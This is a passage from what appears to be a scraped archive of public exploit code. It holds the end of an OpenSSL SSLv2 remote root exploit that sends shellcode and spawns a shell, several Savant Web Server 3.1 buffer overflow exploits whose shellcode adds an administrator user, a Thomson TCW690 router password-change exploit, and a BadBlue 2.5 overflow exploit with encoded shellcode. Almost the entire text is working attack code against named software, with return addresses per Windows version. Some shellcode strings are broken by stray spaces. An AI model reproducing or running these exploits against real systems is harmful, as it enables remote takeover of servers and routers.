printf("get_server_hello: SESSION-ID-HIT is not 0\n");
exit(1);
}
if (*(p++) != 1) {
printf("get_server_hello: CERTIFICATE-TYPE is not SSL CT X509 CERTIFICATE\n");
exit(1);
}
n2s(p, server_version);
if (server_version != 2) {
printf("get_server_hello: Unsupported server version %d\n", server_version);
exit(1);
}
n2s(p, cert_length);
n2s(p, cs_length);
n2s(p, conn_id_length);
if (len != 11 + cert_length + cs_length + conn_id_length) {
printf("get_server_hello: Malformed packet size\n");
exit(1);
}
/* read the server certificate */
ssl->x509 = NULL;
ssl->x509=d2i_X509(NULL,&p,(long)cert_length);
if (ssl->x509 == NULL) {
printf("get server hello: Cannot parse x509 certificate\n");
exit(1);
}
if (cs_length % 3 != 0) {
printf("get server hello: CIPHER-SPECS-LENGTH is not a multiple of 3\n");
exit(1);
}
found = 0;
for (end=p+cs_length; p < end; p += 3) {
if ((p[0] == 0x01) && (p[1] == 0x00) && (p[2] == 0x80))
found = 1; /* SSL CK RC4 128 WITH MD5 */
}
if (!found) {
printf("get server hello: Remote server does not support 128 bit RC4\n");
exit(1);
}
if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH) {
printf("get server hello: CONNECTION-ID-LENGTH is too long\n");
exit(1);
}
/* The connection id is sent back to the server in the CLIENT FINISHED packet */
ssl->conn_id_length = conn_id_length;
memcpy(ssl->conn_id, p, conn_id_length);
}
/* Send a CLIENT MASTER KEY message to the server */
void send_client_master_key(ssl_conn* ssl, unsigned char* key_arg_overwrite, int key_arg_overwrite_len) {
int encrypted_key_length, key_arg_length, record_length;
unsigned char* p;
int i;
EVP_PKEY *pkey=NULL;
unsigned char buf[BUFSIZE] =
"\x02" /* client master key message */
"\x01\x00\x80" /* cipher kind */
"\x00\x00" /* clear key length */
"\x00\x40" /* encrypted key length */
"\x00\x08"; /* key arg length */
p = &buf[10];
/* generate a 128 byte master key */
for (i = 0; i < RC4_KEY_LENGTH; i++) {
ssl->master_key[i] = (unsigned char) (rand() >> 24);
}
pkey=X509_get_pubkey(ssl->x509);
if (!pkey) {
printf("send client master key: No public key in the server certificate\n");
exit(1);
}
if (pkey->type != EVP_PKEY_RSA) {
printf("send client master key: The public key in the server certificate is not a RSA key\n");
exit(1);
}
/* Encrypt the client master key with the server public key and put it in the packet */
encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], pkey->pkey.rsa, RSA_PKCS1_PADDING);
if (encrypted_key_length <= 0) {
printf("send client master key: RSA encryption failure\n");
exit(1);
}
p += encrypted_key_length;
if (key_arg_overwrite) {
/* These 8 bytes fill the key arg array on the server */
for (i = 0; i < 8; i++) {
*(p++) = (unsigned char) (rand() >> 24);
}
/* This overwrites the data following the key arg array */
memcpy(p, key_arg_overwrite, key_arg_overwrite_len);
key_arg_length = 8 + key_arg_overwrite_len;
}
else {
key_arg_length = 0; /* RC4 doesn't use KEY-ARG */
}
p = &buf[6];
s2n(encrypted_key_length, p);
s2n(key_arg_length, p);
record_length = 10 + encrypted_key_length + key_arg_length;
send_ssl_packet(ssl, buf, record_length);
ssl->encrypted = 1;
}
void generate_key_material(ssl_conn* ssl)
{
unsigned int i;
MD5_CTX ctx;
unsigned char *km;
unsigned char c='0';
km=ssl->key_material;
for (i=0; i<RC4_KEY_MATERIAL_LENGTH; i+=MD5_DIGEST_LENGTH) {
MD5_Init(&ctx);
MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
MD5_Update(&ctx,&c,1);
c++;
MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
MD5_Final(km,&ctx);
km+=MD5_DIGEST_LENGTH;
}
}
void generate_session_keys(ssl_conn* ssl)
{
generate_key_material(ssl);
ssl->read_key = &(ssl->key_material[0]);
ssl->rc4_read_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
ssl->write_key = &(ssl->key_material[RC4_KEY_LENGTH]);
ssl->rc4_write_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
}
void get_server_verify(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
int len;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
exit(1);
}
if (len != 1 + CHALLENGE_LENGTH) {
printf("get server verify: Malformed packet size\n");
exit(1);
}
if (buf[0] != SSL2_MT_SERVER_VERIFY) {
printf("get server verify: Expected SSL2 MT SERVER VERIFY, got %x\n", (int)buf[0]);
exit(1);
}
if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH)) {
printf("get server verify: Challenge strings don't match\n");
exit(1);
}
}
void send_client_finished(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
buf[0] = SSL2_MT_CLIENT_FINISHED;
memcpy(&buf[1], ssl->conn_id, ssl->conn_id_length);
send_ssl_packet(ssl, buf, 1+ssl->conn_id_length);
}
void get_server_finished(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
int len;
int i;
if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
exit(1);
}
if (buf[0] != SSL2_MT_SERVER_FINISHED) {
printf("get server finished: Expected SSL2 MT SERVER FINISHED, got %x\n", (int)buf[0]);
exit(1);
}
if (len <= 112 /*17*/) {
printf("This server is not vulnerable to this attack.\n");
exit(1);
}
cipher = *(int*)&buf[101];
ciphers = *(int*)&buf[109];
printf("cipher: 0x%x ciphers: 0x%x\n", cipher, ciphers);
}
void get_server_error(ssl_conn* ssl)
{
unsigned char buf[BUFSIZE];
int len;
if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0) {
printf("get server finished: Expected SSL2 MT ERROR, got %x\n", (int)buf[0]);
exit(1);
}
}
void usage(char* argv0)
{
int i;
printf(": Usage: %s target box [port] [-c N]\n\n", argv0);
printf(" target - supported box eg: 0x00\n");
printf(" box - hostname or IP address\n");
printf(" port - port for ssl connection\n");
printf(" -c open N connections. (use range 40-50 if u dont know)\n");
printf(" \n\n");
printf(" Supported OffSet:\n");
for (i=0; i<=MAX_ARCH; i++) {
printf("\t0x%02x - %s\n", i, architectures[i].desc);
}
printf("\n**** to all guys who like use lamah ddos. Read SRC to have no surprise\n");
exit(1);
}
int main(int argc, char* argv[])
{
char* host;
int port = 443;
int i;
int arch;
int N = 0;
ssl_conn* ssl1;
ssl_conn* ssl2;
printf("\n");
printf("************************************************** *****************\n");
printf("* Open**** v3.0.32-root priv8 by SPABAM based on openssl-too-open *\n");
printf("************************************************** *****************\n");
printf("* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *\n");
printf("* #hackarena irc.brasnet.org *\n");
printf("* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *\n");
printf("* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *\n");
printf("* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *\n");
printf("************************************************** *****************\n");
printf("\n");
if ((argc < 3) || (argc > 6))
usage(argv[0]);
sscanf(argv[1], "0x%x", &arch);
if ((arch < 0) || (arch > MAX_ARCH))
usage(argv[0]);
host = argv[2];
if (argc == 4)
port = atoi(argv[3]);
else if (argc == 5) {
if (strcmp(argv[3], "-c"))
usage(argv[0]);
N = atoi(argv[4]);
}
else if (argc == 6) {
port = atoi(argv[3]);
if (strcmp(argv[4], "-c"))
usage(argv[0]);
N = atoi(argv[5]);
}
srand(0x31337);
for (i=0; i<N; i++) {
printf("\rConnection... %d of %d", i+1, N);
fflush(stdout);
connect_host(host, port);
usleep(100000);
}
if (N) printf("\n");
printf("Establishing SSL connection\n");
ssl1 = ssl_connect_host(host, port);
ssl2 = ssl_connect_host(host, port);
send_client_hello(ssl1);
get_server_hello(ssl1);
send_client_master_key(ssl1, overwrite_session_id_length, sizeof(overwrite_session_id_length)-1);
generate_session_keys(ssl1);
get_server_verify(ssl1);
send_client_finished(ssl1);
get_server_finished(ssl1);
printf("Ready to send shellcode\n");
port = get_local_port(ssl2->sock);
overwrite_next_chunk[FINDSCKPORTOFS] = (char) (port & 0xff);
overwrite_next_chunk[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff);
*(int*)&overwrite_next_chunk[156] = cipher;
*(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr - 12;
*(int*)&overwrite_next_chunk[196] = ciphers + 16; /* shellcode address */
send_client_hello(ssl2);
get_server_hello(ssl2);
send_client_master_key(ssl2, overwrite_next_chunk, sizeof(overwrite_next_chunk)-1);
generate_session_keys(ssl2);
get_server_verify(ssl2);
for (i = 0; i < ssl2->conn_id_length; i++) {
ssl2->conn_id[i] = (unsigned char) (rand() >> 24);
}
send_client_finished(ssl2);
get_server_error(ssl2);
printf("Spawning shell...\n");
sleep(1);
sh(ssl2->sock);
close(ssl2->sock);
close(ssl1->sock);
return 0;
}
/* spabam: It isn't 0day */
// [2003-04-04]
80 Savant Web Server 3.1 Remote Buffer Overflow Exploit
################################################## #######
# #
# Savant web server Buffer Overflow Exploit #
# Discovered by : Mati Aharoni #
# Coded by : Tal Zeltzer and Mati Aharoni #
# www.see-security.com #
# FOR RESEACRH PURPOSES ONLY! #
################################################## #######
import struct
import socket
sc = "\x90" * 21
# win32_adduser - PASS=pwd EXITFUNC=thread USER=X Size=232 Encoder=PexFnstenvSub http://metasploit.com
sc += "\x31\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xd8"
sc += "\x23\x73\xe4\x83\xeb\xfc\xe2\xf4\x24\xcb\x35\xe4\x d8\x23\xf8\xa1"
sc += "\xe4\xa8\x0f\xe1\xa0\x22\x9c\x6f\x97\x3b\xf8\xbb\x f8\x22\x98\x07"
sc += "\xf6\x6a\xf8\xd0\x53\x22\x9d\xd5\x18\xba\xdf\x60\x 18\x57\x74\x25"
sc += "\x12\x2e\x72\x26\x33\xd7\x48\xb0\xfc\x27\x06\x07\x 53\x7c\x57\xe5"
sc += "\x33\x45\xf8\xe8\x93\xa8\x2c\xf8\xd9\xc8\xf8\xf8\x 53\x22\x98\x6d"
sc += "\x84\x07\x77\x27\xe9\xe3\x17\x6f\x98\x13\xf6\x24\x a0\x2c\xf8\xa4"
sc += "\xd4\xa8\x03\xf8\x75\xa8\x1b\xec\x31\x28\x73\xe4\x d8\xa8\x33\xd0"
sc += "\xdd\x5f\x73\xe4\xd8\xa8\x1b\xd8\x87\x12\x85\x84\x 8e\xc8\x7e\x8c"
sc += "\x37\xed\x93\x84\xb0\xbb\x8d\x6e\xd6\x74\x8c\x03\x 30\xcd\x8c\x1b"
sc += "\x27\x40\x1e\x80\xf6\x46\x0b\x81\xf8\x0c\x10\xc4\x b6\x46\x07\xc4"
sc += "\xad\x50\x16\x96\xf8\x7b\x53\x94\xaf\x47\x53\xcb\x 99\x67\x37\xc4"
sc += "\xfe\x05\x53\x8a\xbd\x57\x53\x88\xb7\x40\x12\x88\x bf\x51\x1c\x91"
sc += "\xa8\x03\x32\x80\xb5\x4a\x1d\x8d\xab\x57\x01\x85\x ac\x4c\x01\x97"
sc += "\xf8\x7b\x53\xcb\x99\x67\x37\xe4";
sc += "AA"
# Win2k SP0,1,2,3,4
#Change Return address as needed
buf = "\xEB\x19" + " /" + sc + struct.pack("<L",0x750236b2) + "\r\n\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',80))
s.send(buf)
s.close()
# [2005-02-01]
80 Savant Web Server 3.1 Remote Buffer OverflowExploit (win2003)
#!/usr/bin/perl
#
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova>savant.pl
#-h 127.0.0.1
#
#-=[ Savant Web Server 3.1 Remote Buffer Overflow Exploit ]=-
#-=[ ]=-
#-=[ Coded by CorryL info:www.x0n3-h4ck.org ]=-
#
#[+] Connect to 127.0.0.1
#[+] Using 00b7ead8 // Ret For Win2003
#[+] Sending Payload 258 byte
#[+] Creating Administrator User: User 'bug' Password 'hack'
#
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova>net users
#
#Account utente per \\SERVER
# Added above info from http://x0n3-h4ck.org /str0ke #
################################################## ################################
#Savant Web Server 3.1 Remote Buffer Overflow Exploit #
# #
#This is exploit sending the 253 evil byte #
#the eip register the overwrite on 254 > 258 byte #
#exploit succefull created the Administrator User #
#in the server victim #
#Tested on win2003 server using ret 00b7ead8 #
# #
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova>net users #
#Account utente per \\SERVER #
#------------------------------------------------------------------------------- #
#__vmware_user__ Administrator ASPNET #
#bug Guest SUPPORT_388945a0 #
#Esecuzione comando riuscita. #
#D:\Documents and Settings\Administrator\Desktop\explo da uppare\prova> #
# #
#thanks to Mati Aharoni for discovered the bug #
# info: www.x0n3-h4ck.org#
################################################## ################################
use IO::Socket;
use Getopt::Std; getopts('h:', \%args);
if (defined($args{'h'})) { $host = $args{'h'}; }
print STDERR "\n-=[ Savant Web Server 3.1 Remote Buffer Overflow Exploit ]=-\n";
print STDERR "-=[ ]=-\n";
print STDERR "-=[ Coded by CorryL info:www.x0n3-h4ck.org ]=-\n\n";
if (!defined($host)) {
Usage();
}
$nop = "\x90"x13;
$ret= "\xd8\xea\xb7\x00";
my $shellcode =
"\x2b\xc9\x83\xe9\xca\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x09".
"\xb1\xc5\xbd\x83\xeb\xfc\xe2\xf4\xf5\x59\x83\xbd\x 09\xb1\x4e\xf8".
"\x35\x3a\xb9\xb8\x71\xb0\x2a\x36\x46\xa9\x4e\xe2\x 29\xb0\x2e\x5e".
"\x27\xf8\x4e\x89\x82\xb0\x2b\x8c\xc9\x28\x69\x39\x c9\xc5\xc2\x7c".
"\xc3\xbc\xc4\x7f\xe2\x45\xfe\xe9\x2d\xb5\xb0\x5e\x 82\xee\xe1\xbc".
"\xe2\xd7\x4e\xb1\x42\x3a\x9a\xa1\x08\x5a\x4e\xa1\x 82\xb0\x2e\x34".
"\x55\x95\xc1\x7e\x38\x71\xa1\x36\x49\x81\x40\x7d\x 71\xbe\x4e\xfd".
"\x05\x3a\xb5\xa1\xa4\x3a\xad\xb5\xe0\xba\xc5\xbd\x 09\x3a\x85\x89".
"\x0c\xcd\xc5\xbd\x09\x3a\xad\x81\x56\x80\x33\xdd\x 5f\x5a\xc8\xd5".
"\xf9\x3b\xc1\xe2\x61\x29\x3b\x37\x07\xe6\x3a\x5a\x e1\x5f\x3a\x42".
"\xf6\xd2\xa8\xd9\x27\xd4\xbd\xd8\x29\x9e\xa6\x9d\x 67\xd4\xb1\x9d".
"\x7c\xc2\xa0\xcf\x29\xd3\xb0\xda\x29\xd9\xa4\xde\x 62\x91\xea\xfc".
"\x4d\xf5\xe5\x9b\x2f\x91\xab\xd8\x7d\x91\xa9\xd2\x 6a\xd0\xa9\xda".
"\x7b\xde\xb0\xcd\x29\xf0\xa1\xd0\x60\xdf\xac\xce\x 7d\xc3\xa4\xc9".
"\x66\xc3\xb6\x9d\x6b\xc4\xa2\x9d\x26\xf0\x81\xf9\x 09\xb1\xc5\xbd";
print "[+] Connect to $host\n";
$socket = new IO::Socket::INET (PeerAddr => "$host",
PeerPort => 80,
Proto => 'tcp');
die unless $socket;
print "[+] Using 00b7ead8 // Ret For Win2003\n";
$buff = $nop.$shellcode.$ret;
print "[+] Sending Payload 258 byte\n";
$data = "GET /$buff \r\n\r\n";
send ($socket,$data,0);
print "[+] Creating Administrator User: User 'bug' Password 'hack'\n";
close;
sub Usage {
print STDERR "Usage:
-h Victim host.\n\n";
exit;
}
# [2005-02-04]
80 Savant Web Server 3.1 Remote BoF (French Win OS support)
################################################## #######
# #
# Savant web server Buffer Overflow Exploit #
# Discovered by : Mati Aharoni #
# Coded by : Tal Zeltzer and Mati Aharoni #
# www.see-security.com #
# FOR RESEACRH PURPOSES ONLY! #
# FRench Win OS support by Jerome Athias #
################################################## #######
import struct
import socket
sc = "\x90" * 21 #We need this number of nops
# win32_adduser - PASS=pwd EXITFUNC=thread USER=X Size=232 Encoder=PexFnstenvSub http://metasploit.com
sc += "\x31\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xd8"
sc += "\x23\x73\xe4\x83\xeb\xfc\xe2\xf4\x24\xcb\x35\xe4\x d8\x23\xf8\xa1"
sc += "\xe4\xa8\x0f\xe1\xa0\x22\x9c\x6f\x97\x3b\xf8\xbb\x f8\x22\x98\x07"
sc += "\xf6\x6a\xf8\xd0\x53\x22\x9d\xd5\x18\xba\xdf\x60\x 18\x57\x74\x25"
sc += "\x12\x2e\x72\x26\x33\xd7\x48\xb0\xfc\x27\x06\x07\x 53\x7c\x57\xe5"
sc += "\x33\x45\xf8\xe8\x93\xa8\x2c\xf8\xd9\xc8\xf8\xf8\x 53\x22\x98\x6d"
sc += "\x84\x07\x77\x27\xe9\xe3\x17\x6f\x98\x13\xf6\x24\x a0\x2c\xf8\xa4"
sc += "\xd4\xa8\x03\xf8\x75\xa8\x1b\xec\x31\x28\x73\xe4\x d8\xa8\x33\xd0"
sc += "\xdd\x5f\x73\xe4\xd8\xa8\x1b\xd8\x87\x12\x85\x84\x 8e\xc8\x7e\x8c"
sc += "\x37\xed\x93\x84\xb0\xbb\x8d\x6e\xd6\x74\x8c\x03\x 30\xcd\x8c\x1b"
sc += "\x27\x40\x1e\x80\xf6\x46\x0b\x81\xf8\x0c\x10\xc4\x b6\x46\x07\xc4"
sc += "\xad\x50\x16\x96\xf8\x7b\x53\x94\xaf\x47\x53\xcb\x 99\x67\x37\xc4"
sc += "\xfe\x05\x53\x8a\xbd\x57\x53\x88\xb7\x40\x12\x88\x bf\x51\x1c\x91"
sc += "\xa8\x03\x32\x80\xb5\x4a\x1d\x8d\xab\x57\x01\x85\x ac\x4c\x01\x97"
sc += "\xf8\x7b\x53\xcb\x99\x67\x37\xe4";
sc += "AA"
# Win2k SP0,1,2,3,4 (US...)
#Change Return address as needed
#buf = "\xEB\x19" + " /" + sc + struct.pack("<L",0x750236b2) + "\r\n\r\n"
#0x74FA2AC4 pop esi - pop - ret ws2help.dll Win 2K SP4 FR (Found with findjmp2 by Class101 ;)
#buf = "\x90" * 24 + " /" + sc + struct.pack("<L",0x74fa2ac5) + "\r\n\r\n" #EB becomes CB...? so i changed it by nops
#Win XP SP2 FR?
#0x719E260D pop esi - pop - ret ws2help.dll Win XP SP2 FR (Found with findjmp2 by Class101 ;)
#buf = "\x90" * 24 + " /" + sc + struct.pack("<L",0x719e260e) + "\r\n\r\n" #EB becomes CB...? so i changed it by nops
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',80))
s.send(buf)
s.close()
# [2005-02-15]
80 Thomson TCW690 POST Password Validation Exploit
/************************************************** ***************
* Thomson TCW690 POST Password Validation exploit
*
* Tested with hardware version 2.1 and software version ST42.03.0a
* Bug found by: MurDoK <murdok.lnx at gmail.com>
* Date: 02.19.2005
*
* sh-3.00$ gcc mdk_tcw690.c -o tcw690
* sh-3.00$ ./tcw690 192.168.0.1 123
* *****************************************
* Thomson TCW690 POST Password Validation
* Change password exploit coded by MurDoK
* *****************************************
*
* [1] Connecting...
* [2] Sending POST request...
* [3] Done! go to http://192.168.0.1
* sh-3.00$
*
* **** AUNA :/
************************************************** ****************/
#include <netdb.h>
int i=0, x=0, fd;
struct sockaddr_in sock;
struct hostent *he;
char badcode[1000] =
"POST /goform/RgSecurity HTTP/1.1\r\n"
"Connection: Keep-Alive\r\n"
"User-Agent: Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.4.28) KHTML/3.3.2 (like Gecko)\r\n"
"Referer: http://192.168.0.1/RgSecurity.asp\r\n"
"Pragma: no-cache\r\n"
"Cache-control: no-cache\r\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\r\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate\r\n"
"Accept-Charset: iso-8859-15, utf-8;q=0.5, *;q=0.5\r\n"
"Accept-Language: es, en\r\n"
"Host: 192.168.0.1\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Authorization: Basic\r\n"
"Content-Length: 62\r\n"
"\r\n";
//"Password=hack1&PasswordReEnter=hack1&RestoreFactoryNo=0x00";
int main(int argc, char *argv[]) {
// system("clear");
printf("*****************************************\n");
printf(" Thomson TCW690 POST Password Validation\n");
printf(" Change password exploit coded by MurDoK\n");
printf("*****************************************\n\n");
if(argc<3) {
printf("Usage: %s <router IP> <new_password>\n\n", argv[0]);
exit(1);
}
fd = socket(AF_INET, SOCK_STREAM, 0);
he = gethostbyname(argv[1]);
memset((char *) &sock, 0, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port=htons(80);
sock.sin_addr.s_addr=*((unsigned long*)he->h_addr);
printf("[1] Connecting... \n");
if ((connect(fd, (struct sockaddr *) &sock, sizeof(sock))) < 0) {
printf("ERROR: Can't connect to host!\n");
return 0;
}
strcat(badcode, "Password=");
strcat(badcode, argv[2]);
strcat(badcode, "&PasswordReEnter=");
strcat(badcode, argv[2]);
strcat(badcode, "&RestoreFactoryNo=0x00");
printf("[2] Sending POST request...\n");
write(fd, badcode, strlen(badcode));
printf("[3] Done! go to http://%s\n", argv[1]);
close(fd);
return 1;
}
// [2005-02-19]
80 BadBlue 2.5 Easy File Sharing Remote Buffer Overflow
/*
BadBlue, Easy File Sharing Remote BOverflow
Homepage: badblue.com
Affected version: v2.5 (2.60 and below not tested)
Patched version: v2.61
Link: badblue.com/bbs98.exe
Date: 27 February 2005
Application Risk: Severely High
Internet Risk: Low
Dicovery Credits: Andres Tarasco (atarasco _at_ sia.es)
Exploit Credits : class101 & metasploit.com
Hole History:
26-2-2005: BOF flaw published by Andres Tarasco of sia.es
27-2-2002: Hat-Squad.com releases an exploit
28-2-2005: haxorcitos releases a dupe with fake date :>
or you sux doing private stuffs.
Notes:
-6 bad chars, 0x00, 0x26, 0x20, 0x0A, 0x8C, 0x3C, badly interpreted by
BadBlue
-using offsets from ext.dll, universal.
-use findjmp2 to quick search into ext.dll to see
if the offsets changes in the others BadBlue's versions below 2.5
-if you need the v2.5 for exploitation's pratices, get it on class101.org
-rename to .c for nux, haven't tested this one but it should works fine.
Greet:
Nima Majidi
Behrang Fouladi
Pejman
Hat-Squad.com
metasploit.com
A^C^E of addict3d.org
str0ke of enigmagroup.org
and my homy class101.org :>
*/
#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#endif
char scode[]=
/*XORed, I kiss metasploit.com because they are what means elite!*/
"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x 81\x76\x0e\x03"
"\x7b\x5b\x13\x83\xee\xfc\xe2\xf4\xff\x11\xb0\x5c\x eb\x82\xa4\xec"
"\xfc\x1b\xd0\x7f\x27\x5f\xd0\x56\x3f\xf0\x27\x16\x 7b\x7a\xb4\x98"
"\x4c\x63\xd0\x4c\x23\x7a\xb0\xf0\x33\x32\xd0\x27\x 88\x7a\xb5\x22"
"\xc3\xe2\xf7\x97\xc3\x0f\x5c\xd2\xc9\x76\x5a\xd1\x e8\x8f\x60\x47"
"\x27\x53\x2e\xf0\x88\x24\x7f\x12\xe8\x1d\xd0\x1f\x 48\xf0\x04\x0f"
"\x02\x90\x58\x3f\x88\xf2\x37\x37\x1f\x1a\x98\x22\x c3\x1f\xd0\x53"
"\x33\xf0\x1b\x1f\x88\x0b\x47\xbe\x88\x3b\x53\x4d\x 6b\xf5\x15\x1d"
"\xef\x2b\xa4\xc5\x32\xa0\x3d\x40\x65\x13\x68\x21\x 6b\x0c\x28\x21"
"\x5c\x2f\xa4\xc3\x6b\xb0\xb6\xef\x38\x2b\xa4\xc5\x 5c\xf2\xbe\x75"
"\x82\x96\x53\x11\x56\x11\x59\xec\xd3\x13\x82\x1a\x f6\xd6\x0c\xec"
"\xd5\x28\x08\x40\x50\x28\x18\x40\x40\x28\xa4\xc3\x 65\x13\x5b\x76"
"\x65\x28\xd2\xf2\x96\x13\xff\x09\x73\xbc\x0c\xec\x d5\x11\x4b\x42"
"\x56\x84\x8b\x7b\xa7\xd6\x75\xfa\x54\x84\x8d\x40\x 56\x84\x8b\x7b"
"\xe6\x32\xdd\x5a\x54\x84\x8d\x43\x57\x2f\x0e\xec\x d3\xe8\x33\xf4"
"\x7a\xbd\x22\x44\xfc\xad\x0e\xec\xd3\x1d\x31\x77\x 65\x13\x38\x7e"
"\x8a\x9e\x31\x43\x5a\x52\x97\x9a\xe4\x11\x1f\x9a\x e1\x4a\x9b\xe0"
"\xa9\x85\x19\x3e\xfd\x39\x77\x80\x8e\x01\x63\xb8\x a8\xd0\x33\x61"
"\xfd\xc8\x4d\xec\x76\x3f\xa4\xc5\x58\x2c\x09\x42\x 52\x2a\x31\x12"
"\x52\x2a\x0e\x42\xfc\xab\x33\xbe\xda\x7e\x95\x40\x fc\xad\x31\xec"
"\xfc\x4c\xa4\xc3\x88\x2c\xa7\x90\xc7\x1f\xa4\xc5\x 51\x84\x8b\x7b"
"\xf3\xf1\x5f\x4c\x50\x84\x8d\xec\xd3\x7b\x5b\x13";
char payload[1024];
char ebx[]="\x05\x53\x02\x10"; /*call.ext.dll*/
char ebx2[]="\xB0\x55\x02\x10"; /*pop.pop.ret.ext.dll thx findjmp2 ;>*/
char pad[]="\xEB\x0C\x90\x90";
char pad2[]="\xE9\x05\xFE\xFF\xFF";
char EOL[]="\x0D\x0A\x0D\x0A";
char talk[]=
"\x47\x45\x54\x20\x2F\x65\x78\x74\x2E\x64\x6C\x6C\x 3F\x6D\x66\x63"
"\x69\x73\x61\x70\x69\x63\x6F\x6D\x6D\x61\x6E\x64\x 3D";
#ifdef WIN32
WSADATA wsadata;
#endif
void ver();
void usage(char* us);
int main(int argc,char *argv[])
{
ver();
unsigned long gip;
unsigned short gport;
char *target, *os;
if
(argc>6||argc<3||atoi(argv[1])>3||atoi(argv[1])<1){usage(argv[0]);return -1;
}
if (argc==5){usage(argv[0]);return -1;}
if (strlen(argv[2])<7){usage(argv[0]);return -1;}
if (argc==6)
{
if (strlen(argv[4])<7){usage(argv[0]);return -1;}
}
#ifndef WIN32
if (argc==6)
{
gip=inet_addr(argv[4])^(long)0x93939393;
gport=htons(atoi(argv[5]))^(short)0x9393;
}
#define Sleep sleep
#define SOCKET int
#define closesocket(s) close(s)
#else
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
if (argc==6)
{
gip=inet_addr(argv[4])^(ULONG)0x93939393;
gport=htons(atoi(argv[5]))^(USHORT)0x9393;
}
#endif
int ip=htonl(inet_addr(argv[2])), port;
if (argc==4||argc==6){port=atoi(argv[3]);} else port=80;
SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==-1){printf("[+] socket() error\n");return -1;}
if (atoi(argv[1]) == 1){target=ebx;os="Win2k SP4 Server English\n[+] Win2k SP4 Pro. English\n[+] Win2k SP- - -";}
if (atoi(argv[1]) == 2){target=ebx2;os="WinXP SP2 Pro. English\n[+] WinXP SP1a Pro. English\n[+] WinXP SP- - -";}
if (atoi(argv[1]) == 3){target=ebx2;os="Win2003 SP4 Server English\n[+] Win2003 SP- - -";}
printf("[+] target(s): %s\n",os);
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
if (argc==6){printf("[+] reverse mode disabled for this exploit\n");
printf("[+] get the source at class101.org and update yourself!\n");return -1;}
connect(s,( struct sockaddr *)&server,sizeof(server));
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
printf("[+] connected, constructing the payload...\n");
#ifdef WIN32
Sleep(1000);
#else
Sleep(1);
#endif
strcpy(payload,talk);
memset(payload+29,0x90,520);
if (atoi(argv[1]) == 1||atoi(argv[1]) == 2)
{
memcpy(payload+29+492,&pad,4);
memcpy(payload+521+4,target,4);
memcpy(payload+536+1,pad2,5);
}
else
{
memcpy(payload+29+485,&pad,4);
memcpy(payload+514+4,target,4);
memcpy(payload+529+1,pad2,5);
}
strcat(payload,EOL);
memcpy(payload+36+3,scode,strlen(scode));
if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 1, the server prolly rebooted.\n");return -1;}
#ifdef WIN32
Sleep(2000);
#else
Sleep(2);
#endif
printf("[+] size of payload: %d\n",strlen(payload));
printf("[+] payload sent.\n");
return 0;
}
}
closesocket(s);
#ifdef WIN32
WSACleanup();
#endif
return 0;
}
void usage(char* us)
{
printf("USAGE:\n");
printf(" [+] . 101_bblu.exe Target VulnIP (bind mode)\n");
printf(" [+] . 101_bblu.exe Target VulnIP VulnPORT (bind mode)\n");
printf(" [+] . 101_bblu.exe Target VulnIP VulnPORT GayIP GayPORT (reverse mode)\n");
printf("TARGET: \n");
